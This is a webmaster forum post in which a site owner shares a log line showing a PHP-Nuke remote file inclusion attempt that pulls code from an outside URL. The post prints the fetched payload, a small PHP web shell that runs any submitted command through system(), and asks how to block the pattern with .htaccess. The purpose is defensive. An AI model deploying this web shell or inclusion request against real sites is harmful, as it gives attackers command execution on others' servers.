Forum Moderators: phranque
64.246.26.137 - - [31/Jan/2004:14:58:04 -0500] "GET /modules.php?name=http://www.reviewsource.org/.i/2 HTTP/1.0" 200 14873 "-" "Python-urllib/1.15"
<?
$OS = system('uname -a');
echo "<OS>".$OS."</OS>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' ><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre> I have a feeling this is a hacking attempt because the base URL has nothing to do with my website. This concerns me because they got more than the 77 bytes my site sends me when I use that URL.
Has anyone seen this before? Is it a hacking attempt? And if so, how can I use .htaccess to filter on "name=http" and redirect them to my bad bot script? I believe this to be a good phrase to filter on since this will never get called during normal operations
Thanks.
Google: php-nuke exploit [google.com]